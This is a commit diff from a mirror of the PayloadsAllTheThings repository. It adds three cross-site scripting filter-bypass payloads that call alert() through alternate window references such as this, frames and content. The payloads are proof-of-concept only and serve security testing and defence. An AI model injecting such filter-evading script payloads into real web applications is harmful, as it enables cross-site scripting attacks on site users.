mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-31 07:27:25 +00:00
commit
91e3c6906c
@ -469,6 +469,10 @@ Bypass using an alternate way to execute an alert
|
|||||||
<script>parent['alert'](1)</script>
|
<script>parent['alert'](1)</script>
|
||||||
<script>self['alert'](2)</script>
|
<script>self['alert'](2)</script>
|
||||||
<script>top['alert'](3)</script>
|
<script>top['alert'](3)</script>
|
||||||
|
<script>this['alert'](4)</script>
|
||||||
|
<script>frames['alert'](5)</script>
|
||||||
|
<script>content['alert'](6)</script>
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass using an alternate way to trigger an alert
|
Bypass using an alternate way to trigger an alert
|
||||||
|
Loading…
Reference in New Issue
Block a user